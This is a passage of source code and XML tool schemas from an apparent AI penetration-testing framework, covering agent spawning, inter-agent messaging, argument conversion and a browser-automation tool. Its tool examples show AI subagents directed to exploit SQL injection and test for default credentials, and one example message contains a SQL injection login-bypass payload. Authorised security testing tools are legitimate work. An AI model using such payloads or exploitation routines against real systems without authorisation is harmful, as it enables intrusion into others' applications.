thread = threading.Thread(
target=_run_agent_in_thread,
args=(agent, state, inherited_messages),
daemon=True,
name=f"Agent-{name}-{state.agent_id}",
)
thread.start()
_running_agents[state.agent_id] = thread
except Exception as e: # noqa: BLE001
return {"success": False, "error": f"Failed to create agent: {e}", "agent_id": None}
else:
return {
"success": True,
"agent_id": state.agent_id,
"message": f"Agent '{name}' created and started asynchronously",
"agent_info": {
"id": state.agent_id,
"name": name,
"status": "running",
"parent_id": parent_id,
},
}
@register_tool(sandbox_execution=False)
def send_message_to_agent(
agent_state: Any,
target_agent_id: str,
message: str,
message_type: Literal["query", "instruction", "information"] = "information",
priority: Literal["low", "normal", "high", "urgent"] = "normal",
) -> dict[str, Any]:
try:
if target_agent_id not in _agent_graph["nodes"]:
return {
"success": False,
"error": f"Target agent '{target_agent_id}' not found in graph",
"message_id": None,
}
sender_id = agent_state.agent_id
from uuid import uuid4
message_id = f"msg_{uuid4().hex[:8]}"
message_data = {
"id": message_id,
"from": sender_id,
"to": target_agent_id,
"content": message,
"message_type": message_type,
"priority": priority,
"timestamp": datetime.now(UTC).isoformat(),
"delivered": False,
"read": False,
}
if target_agent_id not in _agent_messages:
_agent_messages[target_agent_id] = []
_agent_messages[target_agent_id].append(message_data)
_agent_graph["edges"].append(
{
"from": sender_id,
"to": target_agent_id,
"type": "message",
"message_id": message_id,
"message_type": message_type,
"priority": priority,
"created_at": datetime.now(UTC).isoformat(),
}
)
message_data["delivered"] = True
target_name = _agent_graph["nodes"][target_agent_id]["name"]
sender_name = _agent_graph["nodes"][sender_id]["name"]
return {
"success": True,
"message_id": message_id,
"message": f"Message sent from '{sender_name}' to '{target_name}'",
"delivery_status": "delivered",
"target_agent": {
"id": target_agent_id,
"name": target_name,
"status": _agent_graph["nodes"][target_agent_id]["status"],
},
}
except Exception as e: # noqa: BLE001
return {"success": False, "error": f"Failed to send message: {e}", "message_id": None}
@register_tool(sandbox_execution=False)
def agent_finish(
agent_state: Any,
result_summary: str,
findings: list[str] | None = None,
success: bool = True,
report_to_parent: bool = True,
final_recommendations: list[str] | None = None,
) -> dict[str, Any]:
try:
if not hasattr(agent_state, "parent_id") or agent_state.parent_id is None:
return {
"agent_completed": False,
"error": (
"This tool can only be used by subagents. "
"Root/main agents must use finish_scan instead."
),
"parent_notified": False,
}
agent_id = agent_state.agent_id
if agent_id not in _agent_graph["nodes"]:
return {"agent_completed": False, "error": "Current agent not found in graph"}
agent_node = _agent_graph["nodes"][agent_id]
        agent_node["status"] = "completed" if success else "failed"
agent_node["finished_at"] = datetime.now(UTC).isoformat()
agent_node["result"] = {
"summary": result_summary,
"findings": findings or [],
"success": success,
"recommendations": final_recommendations or [],
}
parent_notified = False
if report_to_parent and agent_node["parent_id"]:
parent_id = agent_node["parent_id"]
if parent_id in _agent_graph["nodes"]:
findings_xml = "\n".join(
f" <finding>{finding}</finding>" for finding in (findings or [])
)
recommendations_xml = "\n".join(
f" <recommendation>{rec}</recommendation>"
for rec in (final_recommendations or [])
)
report_message = f"""<agent_completion_report>
<agent_info>
<agent_name>{agent_node["name"]}</agent_name>
<agent_id>{agent_id}</agent_id>
<task>{agent_node["task"]}</task>
<status>{"SUCCESS" if success else "FAILED"}</status>
<completion_time>{agent_node["finished_at"]}</completion_time>
</agent_info>
<results>
<summary>{result_summary}</summary>
<findings>
{findings_xml}
</findings>
<recommendations>
{recommendations_xml}
</recommendations>
</results>
</agent_completion_report>"""
if parent_id not in _agent_messages:
_agent_messages[parent_id] = []
from uuid import uuid4
_agent_messages[parent_id].append(
{
"id": f"report_{uuid4().hex[:8]}",
"from": agent_id,
"to": parent_id,
"content": report_message,
"message_type": "information",
"priority": "high",
"timestamp": datetime.now(UTC).isoformat(),
"delivered": True,
"read": False,
}
)
parent_notified = True
_running_agents.pop(agent_id, None)
return {
"agent_completed": True,
"parent_notified": parent_notified,
"completion_summary": {
"agent_id": agent_id,
"agent_name": agent_node["name"],
"task": agent_node["task"],
"success": success,
"findings_count": len(findings or []),
"has_recommendations": bool(final_recommendations),
"finished_at": agent_node["finished_at"],
},
}
except Exception as e: # noqa: BLE001
return {
"agent_completed": False,
"error": f"Failed to complete agent: {e}",
"parent_notified": False,
}
def stop_agent(agent_id: str) -> dict[str, Any]:
try:
if agent_id not in _agent_graph["nodes"]:
return {
"success": False,
"error": f"Agent '{agent_id}' not found in graph",
"agent_id": agent_id,
}
agent_node = _agent_graph["nodes"][agent_id]
if agent_node["status"] in ["completed", "error", "failed", "stopped"]:
return {
"success": True,
"message": f"Agent '{agent_node['name']}' was already stopped",
"agent_id": agent_id,
"previous_status": agent_node["status"],
}
if agent_id in _agent_states:
agent_state = _agent_states[agent_id]
agent_state.request_stop()
if agent_id in _agent_instances:
agent_instance = _agent_instances[agent_id]
if hasattr(agent_instance, "state"):
agent_instance.state.request_stop()
if hasattr(agent_instance, "cancel_current_execution"):
agent_instance.cancel_current_execution()
agent_node["status"] = "stopping"
try:
from strix.cli.tracer import get_global_tracer
tracer = get_global_tracer()
if tracer:
tracer.update_agent_status(agent_id, "stopping")
except (ImportError, AttributeError):
pass
agent_node["result"] = {
"summary": "Agent stop requested by user",
"success": False,
"stopped_by_user": True,
}
return {
"success": True,
"message": f"Stop request sent to agent '{agent_node['name']}'",
"agent_id": agent_id,
"agent_name": agent_node["name"],
"note": "Agent will stop gracefully after current iteration",
}
except Exception as e: # noqa: BLE001
return {
"success": False,
"error": f"Failed to stop agent: {e}",
"agent_id": agent_id,
}
def send_user_message_to_agent(agent_id: str, message: str) -> dict[str, Any]:
try:
if agent_id not in _agent_graph["nodes"]:
return {
"success": False,
"error": f"Agent '{agent_id}' not found in graph",
"agent_id": agent_id,
}
agent_node = _agent_graph["nodes"][agent_id]
if agent_id not in _agent_messages:
_agent_messages[agent_id] = []
from uuid import uuid4
message_data = {
"id": f"user_msg_{uuid4().hex[:8]}",
"from": "user",
"to": agent_id,
"content": message,
"message_type": "instruction",
"priority": "high",
"timestamp": datetime.now(UTC).isoformat(),
"delivered": True,
"read": False,
}
_agent_messages[agent_id].append(message_data)
return {
"success": True,
"message": f"Message sent to agent '{agent_node['name']}'",
"agent_id": agent_id,
"agent_name": agent_node["name"],
}
except Exception as e: # noqa: BLE001
return {
"success": False,
"error": f"Failed to send message to agent: {e}",
"agent_id": agent_id,
}
@register_tool(sandbox_execution=False)
def wait_for_message(
agent_state: Any,
reason: str = "Waiting for messages from other agents or user input",
) -> dict[str, Any]:
try:
agent_id = agent_state.agent_id
agent_name = agent_state.agent_name
agent_state.enter_waiting_state()
if agent_id in _agent_graph["nodes"]:
_agent_graph["nodes"][agent_id]["status"] = "waiting"
_agent_graph["nodes"][agent_id]["waiting_reason"] = reason
try:
from strix.cli.tracer import get_global_tracer
tracer = get_global_tracer()
if tracer:
tracer.update_agent_status(agent_id, "waiting")
except (ImportError, AttributeError):
pass
except Exception as e: # noqa: BLE001
return {"success": False, "error": f"Failed to enter waiting state: {e}", "status": "error"}
else:
return {
"success": True,
"status": "waiting",
"message": f"Agent '{agent_name}' is now waiting for messages",
"reason": reason,
"agent_info": {
"id": agent_id,
"name": agent_name,
"status": "waiting",
},
"resume_conditions": [
"Message from another agent",
"Message from user",
"Direct communication",
],
}
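The per-agent message queues above (dicts of agent_id to message lists, with short uuid-derived ids and read flags) can be sketched in isolation. `Mailbox` and its method names are illustrative, not part of the Strix API:

```python
from datetime import datetime, timezone
from typing import Any
from uuid import uuid4


class Mailbox:
    """Minimal sketch of per-agent message queues, as used by the tools above."""

    def __init__(self) -> None:
        self._messages: dict[str, list[dict[str, Any]]] = {}

    def send(self, agent_id: str, content: str, sender: str = "user") -> dict[str, Any]:
        message = {
            "id": f"user_msg_{uuid4().hex[:8]}",
            "from": sender,
            "to": agent_id,
            "content": content,
            "timestamp": datetime.now(timezone.utc).isoformat(),
            "read": False,
        }
        self._messages.setdefault(agent_id, []).append(message)
        return message

    def unread(self, agent_id: str) -> list[dict[str, Any]]:
        # A waiting agent resumes when this becomes non-empty.
        pending = [m for m in self._messages.get(agent_id, []) if not m["read"]]
        for m in pending:
            m["read"] = True
        return pending


box = Mailbox()
box.send("agent_abc123", "Focus on the authenticated areas.")
```

A waiting agent's loop would poll `unread()` and exit its waiting state on the first non-empty result; the real implementation additionally tracks `message_type` and `priority` fields.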

View File

@@ -0,0 +1,223 @@
<tools>
<tool name="agent_finish">
<description>Mark a subagent's task as completed and optionally report results to parent agent.
IMPORTANT: This tool can ONLY be used by subagents (agents with a parent).
Root/main agents must use finish_scan instead.
This tool should be called when a subagent completes its assigned subtask to:
- Mark the subagent's task as completed
- Report findings back to the parent agent
Use this tool when:
- You are a subagent working on a specific subtask
- You have completed your assigned task
- You want to report your findings to the parent agent
- You are ready to terminate this subagent's execution</description>
<details>This is the subagent counterpart of finish_scan: it marks the subagent's
task as completed and can report its findings back to the parent agent
for coordination. Root/main agents still finish with finish_scan.</details>
<parameters>
<parameter name="result_summary" type="string" required="true">
<description>Summary of what the agent accomplished and discovered</description>
</parameter>
<parameter name="findings" type="string" required="false">
<description>List of specific findings, vulnerabilities, or discoveries</description>
</parameter>
<parameter name="success" type="boolean" required="false">
<description>Whether the agent's task completed successfully</description>
</parameter>
<parameter name="report_to_parent" type="boolean" required="false">
<description>Whether to send results back to the parent agent</description>
</parameter>
<parameter name="final_recommendations" type="string" required="false">
<description>Recommendations for next steps or follow-up actions</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing:
- agent_completed: Whether the agent was marked as completed
- parent_notified: Whether parent was notified (if applicable)
- completion_summary: Summary of completion status</description>
</returns>
<examples>
# Sub-agent completing subdomain enumeration task
<function=agent_finish>
<parameter=result_summary>Completed comprehensive subdomain enumeration for target.com.
Discovered 47 subdomains including several interesting ones with admin/dev
in the name. Found 3 subdomains with exposed services on non-standard
ports.</parameter>
<parameter=findings>["admin.target.com - exposed phpMyAdmin",
"dev-api.target.com - unauth API endpoints",
"staging.target.com - directory listing enabled",
"mail.target.com - POP3/IMAP services"]</parameter>
<parameter=success>true</parameter>
<parameter=report_to_parent>true</parameter>
<parameter=final_recommendations>["Prioritize testing admin.target.com for default creds",
"Enumerate dev-api.target.com API endpoints",
"Check staging.target.com for sensitive files"]</parameter>
</function>
</examples>
</tool>
<tool name="create_agent">
<description>Create and spawn a new agent to handle a specific subtask.
MANDATORY REQUIREMENT: You MUST call view_agent_graph FIRST before creating any new agent to check if there is already an agent working on the same or similar task. Only create a new agent if no existing agent is handling the specific task.</description>
<details>The new agent inherits the parent's conversation history and context up to the point
of creation, then continues with its assigned subtask. This enables decomposition
of complex penetration testing tasks into specialized sub-agents.
The agent runs asynchronously and independently, allowing the parent to continue
immediately while the new agent executes its task in the background.
CRITICAL: Before calling this tool, you MUST first use view_agent_graph to:
- Examine all existing agents and their current tasks
- Verify no agent is already working on the same or similar objective
- Avoid duplication of effort and resource waste
- Ensure efficient coordination across the multi-agent system
If you as a parent agent have nothing else to do while your subagents are running, you can use the wait_for_message tool. The subagents will continue to run in the background and update you when they're done.
</details>
<parameters>
<parameter name="task" type="string" required="true">
<description>The specific task/objective for the new agent to accomplish</description>
</parameter>
<parameter name="name" type="string" required="true">
<description>Human-readable name for the agent (for tracking purposes)</description>
</parameter>
<parameter name="inherit_context" type="boolean" required="false">
<description>Whether the new agent should inherit parent's conversation history and context</description>
</parameter>
<parameter name="prompt_modules" type="string" required="false">
<description>Comma-separated list of prompt modules to use for the agent. Most agents should have at least one module in order to be useful. {{DYNAMIC_MODULES_DESCRIPTION}}</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing:
- agent_id: Unique identifier for the created agent
- success: Whether the agent was created successfully
- message: Status message
- agent_info: Details about the created agent</description>
</returns>
<examples>
# REQUIRED: First check agent graph before creating any new agent
<function=view_agent_graph>
</function>
# After confirming no SQL testing agent exists, create agent for vulnerability validation
<function=create_agent>
<parameter=task>Validate and exploit the suspected SQL injection vulnerability found in
the login form. Confirm exploitability and document proof of concept.</parameter>
<parameter=name>SQLi Validator</parameter>
<parameter=prompt_modules>sql_injection</parameter>
</function>
# Create specialized authentication testing agent with multiple modules (comma-separated)
<function=create_agent>
<parameter=task>Test authentication mechanisms, JWT implementation, and session management
for security vulnerabilities and bypass techniques.</parameter>
<parameter=name>Auth Specialist</parameter>
<parameter=prompt_modules>authentication_jwt, business_logic</parameter>
</function>
</examples>
</tool>
<tool name="send_message_to_agent">
<description>Send a message to another agent in the graph for coordination and communication.</description>
<details>This enables agents to communicate with each other during execution for:
- Sharing discovered information or findings
- Asking questions or requesting assistance
- Providing instructions or coordination
- Reporting status or results</details>
<parameters>
<parameter name="target_agent_id" type="string" required="true">
<description>ID of the agent to send the message to</description>
</parameter>
<parameter name="message" type="string" required="true">
<description>The message content to send</description>
</parameter>
<parameter name="message_type" type="string" required="false">
<description>Type of message being sent:
- "query": Question requiring a response
- "instruction": Command or directive for the target agent
- "information": Informational message (findings, status, etc.)</description>
</parameter>
<parameter name="priority" type="string" required="false">
<description>Priority level of the message</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing:
- success: Whether the message was sent successfully
- message_id: Unique identifier for the message
- delivery_status: Status of message delivery</description>
</returns>
<examples>
# Share discovered vulnerability information
<function=send_message_to_agent>
<parameter=target_agent_id>agent_abc123</parameter>
<parameter=message>Found SQL injection vulnerability in /login.php parameter 'username'.
Payload: admin' OR '1'='1' -- successfully bypassed authentication.
You should focus your testing on the authenticated areas of the
application.</parameter>
<parameter=message_type>information</parameter>
<parameter=priority>high</parameter>
</function>
# Request assistance from specialist agent
<function=send_message_to_agent>
<parameter=target_agent_id>agent_def456</parameter>
<parameter=message>I've identified what appears to be a custom encryption implementation
in the API responses. Can you analyze the cryptographic strength and look
for potential weaknesses?</parameter>
<parameter=message_type>query</parameter>
<parameter=priority>normal</parameter>
</function>
</examples>
</tool>
<tool name="view_agent_graph">
<description>View the current agent graph showing all agents, their relationships, and status.</description>
<details>This provides a comprehensive overview of the multi-agent system including:
- All agent nodes with their tasks, status, and metadata
- Parent-child relationships between agents
- Message communication patterns
- Current execution state</details>
<returns type="Dict[str, Any]">
<description>Response containing:
- graph_structure: Human-readable representation of the agent graph
- summary: High-level statistics about the graph</description>
</returns>
</tool>
<tool name="wait_for_message">
<description>Pause the agent loop indefinitely until receiving a message from another agent or user.
This tool puts the agent into a waiting state where it remains idle until it receives any form of communication. The agent will automatically resume execution when a message arrives.
IMPORTANT: This tool causes the agent to stop all activity until a message is received. Use it when you need to:
- Wait for subagent completion reports
- Coordinate with other agents before proceeding
- Pause for user input or decisions
- Synchronize multi-agent workflows
NOTE: If you are waiting for an agent that is NOT your subagent, you must first tell it to message you with updates before waiting for it. Otherwise, you will wait forever!
</description>
<details>When this tool is called, the agent enters a waiting state and will not continue execution until:
- Another agent sends it a message via send_message_to_agent
- A user sends it a direct message through the CLI
- Any other form of inter-agent or user communication occurs
The agent will automatically resume from where it left off once a message is received.
This is particularly useful for parent agents waiting for subagent results or for coordination points in multi-agent workflows.</details>
<parameters>
<parameter name="reason" type="string" required="false">
<description>Explanation for why the agent is waiting (for logging and monitoring purposes)</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing:
- success: Whether the agent successfully entered waiting state
- status: Current agent status ("waiting")
- reason: The reason for waiting
- agent_info: Details about the waiting agent
- resume_conditions: List of conditions that will resume the agent</description>
</returns>
<examples>
# Wait for subagents to complete their tasks
<function=wait_for_message>
<parameter=reason>Waiting for subdomain enumeration and port scanning subagents to complete their tasks and report findings</parameter>
</function>
# Wait for user input on next steps
<function=wait_for_message>
<parameter=reason>Waiting for user decision on whether to proceed with exploitation of discovered SQL injection vulnerability</parameter>
</function>
# Coordinate with other agents
<function=wait_for_message>
<parameter=reason>Waiting for vulnerability assessment agent to share discovered attack vectors before proceeding with exploitation phase</parameter>
</function>
</examples>
</tool>
</tools>


@@ -0,0 +1,120 @@
import contextlib
import inspect
import json
from collections.abc import Callable
from typing import Any, Union, get_args, get_origin
class ArgumentConversionError(Exception):
def __init__(self, message: str, param_name: str | None = None) -> None:
self.param_name = param_name
super().__init__(message)
def convert_arguments(func: Callable[..., Any], kwargs: dict[str, Any]) -> dict[str, Any]:
try:
sig = inspect.signature(func)
converted = {}
for param_name, value in kwargs.items():
if param_name not in sig.parameters:
converted[param_name] = value
continue
param = sig.parameters[param_name]
param_type = param.annotation
if param_type == inspect.Parameter.empty or value is None:
converted[param_name] = value
continue
if not isinstance(value, str):
converted[param_name] = value
continue
try:
converted[param_name] = convert_string_to_type(value, param_type)
except (ValueError, TypeError, json.JSONDecodeError) as e:
raise ArgumentConversionError(
f"Failed to convert argument '{param_name}' to type {param_type}: {e}",
param_name=param_name,
) from e
except (ValueError, TypeError, AttributeError) as e:
raise ArgumentConversionError(f"Failed to process function arguments: {e}") from e
return converted
def convert_string_to_type(value: str, param_type: Any) -> Any:
origin = get_origin(param_type)
if origin is Union or origin is type(str | None):
args = get_args(param_type)
for arg_type in args:
if arg_type is not type(None):
with contextlib.suppress(ValueError, TypeError, json.JSONDecodeError):
return convert_string_to_type(value, arg_type)
return value
if hasattr(param_type, "__args__"):
args = getattr(param_type, "__args__", ())
if len(args) == 2 and type(None) in args:
non_none_type = args[0] if args[1] is type(None) else args[1]
with contextlib.suppress(ValueError, TypeError, json.JSONDecodeError):
return convert_string_to_type(value, non_none_type)
return value
return _convert_basic_types(value, param_type, origin)
def _convert_basic_types(value: str, param_type: Any, origin: Any = None) -> Any:
basic_type_converters: dict[Any, Callable[[str], Any]] = {
int: int,
float: float,
bool: _convert_to_bool,
str: str,
}
if param_type in basic_type_converters:
return basic_type_converters[param_type](value)
if list in (origin, param_type):
return _convert_to_list(value)
if dict in (origin, param_type):
return _convert_to_dict(value)
with contextlib.suppress(json.JSONDecodeError):
return json.loads(value)
return value
def _convert_to_bool(value: str) -> bool:
if value.lower() in ("true", "1", "yes", "on"):
return True
if value.lower() in ("false", "0", "no", "off"):
return False
return bool(value)
def _convert_to_list(value: str) -> list[Any]:
try:
parsed = json.loads(value)
if isinstance(parsed, list):
return parsed
except json.JSONDecodeError:
if "," in value:
return [item.strip() for item in value.split(",")]
return [value]
else:
return [parsed]
def _convert_to_dict(value: str) -> dict[str, Any]:
try:
parsed = json.loads(value)
if isinstance(parsed, dict):
return parsed
except json.JSONDecodeError:
return {}
else:
return {}
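Since LLM tool calls often deliver every argument as a string, the converters above coerce each value toward its annotated type, preferring JSON and falling back to lenient heuristics. A minimal, self-contained sketch of the same coercion rules (a standalone `coerce` helper, not an import of this module):

```python
import json
from typing import Any


def coerce(value: str, target: type) -> Any:
    """Mirror of the string-to-type rules used by convert_string_to_type."""
    if target is bool:
        # Accept common truthy/falsy spellings before falling back to bool().
        lowered = value.lower()
        if lowered in ("true", "1", "yes", "on"):
            return True
        if lowered in ("false", "0", "no", "off"):
            return False
        return bool(value)
    if target in (int, float, str):
        return target(value)
    if target is list:
        try:
            parsed = json.loads(value)
            return parsed if isinstance(parsed, list) else [parsed]
        except json.JSONDecodeError:
            # Fall back to comma-splitting for bare "a, b, c" strings.
            return [item.strip() for item in value.split(",")] if "," in value else [value]
    if target is dict:
        try:
            parsed = json.loads(value)
            return parsed if isinstance(parsed, dict) else {}
        except json.JSONDecodeError:
            return {}
    return value
```

The real module adds `Optional`/`Union` unwrapping via `get_origin`/`get_args` before applying these base rules, so `list[str] | None` coerces the same way as `list`.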


@@ -0,0 +1,4 @@
from .browser_actions import browser_action
__all__ = ["browser_action"]


@@ -0,0 +1,236 @@
from typing import Any, Literal, NoReturn
from strix.tools.registry import register_tool
from .tab_manager import BrowserTabManager, get_browser_tab_manager
BrowserAction = Literal[
"launch",
"goto",
"click",
"type",
"scroll_down",
"scroll_up",
"back",
"forward",
"new_tab",
"switch_tab",
"close_tab",
"wait",
"execute_js",
"double_click",
"hover",
"press_key",
"save_pdf",
"get_console_logs",
"view_source",
"close",
"list_tabs",
]
def _validate_url(action_name: str, url: str | None) -> None:
if not url:
raise ValueError(f"url parameter is required for {action_name} action")
def _validate_coordinate(action_name: str, coordinate: str | None) -> None:
if not coordinate:
raise ValueError(f"coordinate parameter is required for {action_name} action")
def _validate_text(action_name: str, text: str | None) -> None:
if not text:
raise ValueError(f"text parameter is required for {action_name} action")
def _validate_tab_id(action_name: str, tab_id: str | None) -> None:
if not tab_id:
raise ValueError(f"tab_id parameter is required for {action_name} action")
def _validate_js_code(action_name: str, js_code: str | None) -> None:
if not js_code:
raise ValueError(f"js_code parameter is required for {action_name} action")
def _validate_duration(action_name: str, duration: float | None) -> None:
if duration is None:
raise ValueError(f"duration parameter is required for {action_name} action")
def _validate_key(action_name: str, key: str | None) -> None:
if not key:
raise ValueError(f"key parameter is required for {action_name} action")
def _validate_file_path(action_name: str, file_path: str | None) -> None:
if not file_path:
raise ValueError(f"file_path parameter is required for {action_name} action")
def _handle_navigation_actions(
manager: BrowserTabManager,
action: str,
url: str | None = None,
tab_id: str | None = None,
) -> dict[str, Any]:
if action == "launch":
return manager.launch_browser(url)
if action == "goto":
_validate_url(action, url)
assert url is not None
return manager.goto_url(url, tab_id)
if action == "back":
return manager.back(tab_id)
if action == "forward":
return manager.forward(tab_id)
raise ValueError(f"Unknown navigation action: {action}")
def _handle_interaction_actions(
manager: BrowserTabManager,
action: str,
coordinate: str | None = None,
text: str | None = None,
key: str | None = None,
tab_id: str | None = None,
) -> dict[str, Any]:
if action in {"click", "double_click", "hover"}:
_validate_coordinate(action, coordinate)
assert coordinate is not None
action_map = {
"click": manager.click,
"double_click": manager.double_click,
"hover": manager.hover,
}
return action_map[action](coordinate, tab_id)
if action in {"scroll_down", "scroll_up"}:
direction = "down" if action == "scroll_down" else "up"
return manager.scroll(direction, tab_id)
if action == "type":
_validate_text(action, text)
assert text is not None
return manager.type_text(text, tab_id)
if action == "press_key":
_validate_key(action, key)
assert key is not None
return manager.press_key(key, tab_id)
raise ValueError(f"Unknown interaction action: {action}")
def _raise_unknown_action(action: str) -> NoReturn:
raise ValueError(f"Unknown action: {action}")
def _handle_tab_actions(
manager: BrowserTabManager,
action: str,
url: str | None = None,
tab_id: str | None = None,
) -> dict[str, Any]:
if action == "new_tab":
return manager.new_tab(url)
if action == "switch_tab":
_validate_tab_id(action, tab_id)
assert tab_id is not None
return manager.switch_tab(tab_id)
if action == "close_tab":
_validate_tab_id(action, tab_id)
assert tab_id is not None
return manager.close_tab(tab_id)
if action == "list_tabs":
return manager.list_tabs()
raise ValueError(f"Unknown tab action: {action}")
def _handle_utility_actions(
manager: BrowserTabManager,
action: str,
duration: float | None = None,
js_code: str | None = None,
file_path: str | None = None,
tab_id: str | None = None,
clear: bool = False,
) -> dict[str, Any]:
if action == "wait":
_validate_duration(action, duration)
assert duration is not None
return manager.wait_browser(duration, tab_id)
if action == "execute_js":
_validate_js_code(action, js_code)
assert js_code is not None
return manager.execute_js(js_code, tab_id)
if action == "save_pdf":
_validate_file_path(action, file_path)
assert file_path is not None
return manager.save_pdf(file_path, tab_id)
if action == "get_console_logs":
return manager.get_console_logs(tab_id, clear)
if action == "view_source":
return manager.view_source(tab_id)
if action == "close":
return manager.close_browser()
raise ValueError(f"Unknown utility action: {action}")
@register_tool
def browser_action(
action: BrowserAction,
url: str | None = None,
coordinate: str | None = None,
text: str | None = None,
tab_id: str | None = None,
js_code: str | None = None,
duration: float | None = None,
key: str | None = None,
file_path: str | None = None,
clear: bool = False,
) -> dict[str, Any]:
manager = get_browser_tab_manager()
try:
navigation_actions = {"launch", "goto", "back", "forward"}
interaction_actions = {
"click",
"type",
"double_click",
"hover",
"press_key",
"scroll_down",
"scroll_up",
}
tab_actions = {"new_tab", "switch_tab", "close_tab", "list_tabs"}
utility_actions = {
"wait",
"execute_js",
"save_pdf",
"get_console_logs",
"view_source",
"close",
}
if action in navigation_actions:
return _handle_navigation_actions(manager, action, url, tab_id)
if action in interaction_actions:
return _handle_interaction_actions(manager, action, coordinate, text, key, tab_id)
if action in tab_actions:
return _handle_tab_actions(manager, action, url, tab_id)
if action in utility_actions:
return _handle_utility_actions(
manager, action, duration, js_code, file_path, tab_id, clear
)
_raise_unknown_action(action)
except (ValueError, RuntimeError) as e:
return {
"error": str(e),
"tab_id": tab_id,
"screenshot": "",
"is_running": False,
}
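`browser_action` routes each action through set membership to a category handler, validates required parameters per action, and surfaces failures as error dicts rather than exceptions. The pattern, reduced to a standalone sketch (the handler categories and return shapes here are illustrative, not the real tool's):

```python
from typing import Any


def _require(name: str, value: Any, action: str) -> None:
    # Matches the _validate_* helpers: required-parameter check per action.
    if value is None:
        raise ValueError(f"{name} parameter is required for {action} action")


def dispatch(action: str, **kwargs: Any) -> dict[str, Any]:
    navigation = {"goto", "back", "forward"}
    interaction = {"click", "type"}

    try:
        if action in navigation:
            if action == "goto":
                _require("url", kwargs.get("url"), action)
            return {"handled_by": "navigation", "action": action}
        if action in interaction:
            if action == "click":
                _require("coordinate", kwargs.get("coordinate"), action)
            return {"handled_by": "interaction", "action": action}
        raise ValueError(f"Unknown action: {action}")
    except ValueError as e:
        # Mirror browser_action: surface errors as data, not exceptions,
        # so the agent loop can read them like any other tool result.
        return {"error": str(e)}
```

Returning errors as data keeps the tool interface uniform for the agent: every call yields a dict it can inspect, whether the action succeeded or not.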


@@ -0,0 +1,183 @@
<?xml version="1.0" ?>
<tools>
<tool name="browser_action">
<description>Perform browser actions using a Playwright-controlled browser with multiple tabs.
The browser is PERSISTENT and remains active until explicitly closed, allowing for
multi-step workflows and long-running processes across multiple tabs.</description>
<parameters>
<parameter name="action" type="string" required="true">
<description>The browser action to perform. One of: 'launch', 'goto', 'click', 'type', 'scroll_down', 'scroll_up', 'back', 'forward', 'new_tab', 'switch_tab', 'close_tab', 'wait', 'execute_js', 'double_click', 'hover', 'press_key', 'save_pdf', 'get_console_logs', 'view_source', 'close', 'list_tabs'.</description>
</parameter>
<parameter name="url" type="string" required="false">
<description>Required for 'launch', 'goto', and optionally for 'new_tab' actions. The URL to launch the browser at, navigate to, or load in new tab. Must include appropriate protocol (e.g., http://, https://, file://).</description>
</parameter>
<parameter name="coordinate" type="string" required="false">
<description>Required for 'click', 'double_click', and 'hover' actions. Format: "x,y" (e.g., "432,321"). Coordinates should target the center of elements (buttons, links, etc.). Must be within the browser viewport resolution. Be very careful to calculate the coordinates correctly based on the previous screenshot.</description>
</parameter>
<parameter name="text" type="string" required="false">
<description>Required for 'type' action. The text to type in the field.</description>
</parameter>
<parameter name="tab_id" type="string" required="false">
<description>Required for 'switch_tab' and 'close_tab' actions. Optional for other actions to specify which tab to operate on. The ID of the tab to operate on. The first tab created during 'launch' has ID "tab_1". If not provided, actions will operate on the currently active tab.</description>
</parameter>
<parameter name="js_code" type="string" required="false">
<description>Required for 'execute_js' action. JavaScript code to execute in the page context. The code runs in the context of the current page and has access to the DOM and all page-defined variables and functions. The last evaluated expression's value is returned in the response.</description>
</parameter>
<parameter name="duration" type="string" required="false">
<description>Required for 'wait' action. Number of seconds to pause execution. Can be fractional (e.g., 0.5 for half a second).</description>
</parameter>
<parameter name="key" type="string" required="false">
<description>Required for 'press_key' action. The key to press. Valid values include:
- Single characters: 'a'-'z', 'A'-'Z', '0'-'9'
- Special keys: 'Enter', 'Escape', 'ArrowLeft', 'ArrowRight', etc.
- Modifier keys: 'Shift', 'Control', 'Alt', 'Meta'
- Function keys: 'F1'-'F12'</description>
</parameter>
<parameter name="file_path" type="string" required="false">
<description>Required for 'save_pdf' action. The file path where to save the PDF.</description>
</parameter>
<parameter name="clear" type="boolean" required="false">
<description>For 'get_console_logs' action: whether to clear console logs after retrieving them. Default is False (keep logs).</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing:
- screenshot: Base64 encoded PNG of the current page state
- url: Current page URL
- title: Current page title
- viewport: Current browser viewport dimensions
- tab_id: ID of the current active tab
- all_tabs: Dict of all open tab IDs and their URLs
- message: Status message about the action performed
- js_result: Result of JavaScript execution (for execute_js action)
- pdf_saved: File path of saved PDF (for save_pdf action)
- console_logs: Array of console messages (for get_console_logs action). Limited to 30KB total and the 200 most recent logs; individual messages truncated at 1KB.
- page_source: HTML source code (for view_source action). Large pages are truncated to 20KB (keeping beginning and end sections).</description>
</returns>
<notes>
Important usage rules:
1. PERSISTENCE: The browser remains active and maintains its state until
explicitly closed with the 'close' action. This allows for multi-step workflows
across multiple tool calls and tabs.
2. Browser interaction MUST start with 'launch' and end with 'close'.
3. Only one action can be performed per call.
4. To visit a new URL not reachable from the current page, you can:
- Use 'goto' action
- Open a new tab with the URL
- Close browser and relaunch
5. Click coordinates must be derived from the most recent screenshot.
6. You MUST click on the center of the element, not the edge. You MUST calculate
the coordinates correctly based on the previous screenshot, otherwise the click
will fail. After clicking, check the new screenshot to verify the click was
successful.
7. Tab management:
- First tab from 'launch' is "tab_1"
- New tabs are numbered sequentially ("tab_2", "tab_3", etc.)
- Must have at least one tab open at all times
- Actions affect the currently active tab unless tab_id is specified
8. JavaScript execution (following Playwright evaluation patterns):
- Code runs in the browser page context, not the tool context
- Has access to DOM (document, window, etc.) and page variables/functions
- The LAST EVALUATED EXPRESSION is automatically returned - no return statement needed
- For simple values: document.title (returns the title)
- For objects: {title: document.title, url: location.href} (returns the object)
- For async operations: Use await and the promise result will be returned
- AVOID explicit return statements - they can break evaluation
- Object literals must be wrapped in parentheses when they are the final expression
- Variables from tool context are NOT available - pass data as parameters if needed
- Examples of correct patterns:
* Single value: document.querySelectorAll('img').length
* Object result: {images: document.images.length, links: document.links.length}
* Async operation: await fetch(location.href).then(r => r.status)
* DOM manipulation: document.body.style.backgroundColor = 'red'; 'background changed'
9. Wait action:
- Time is specified in seconds
- Can be used to wait for page loads, animations, etc.
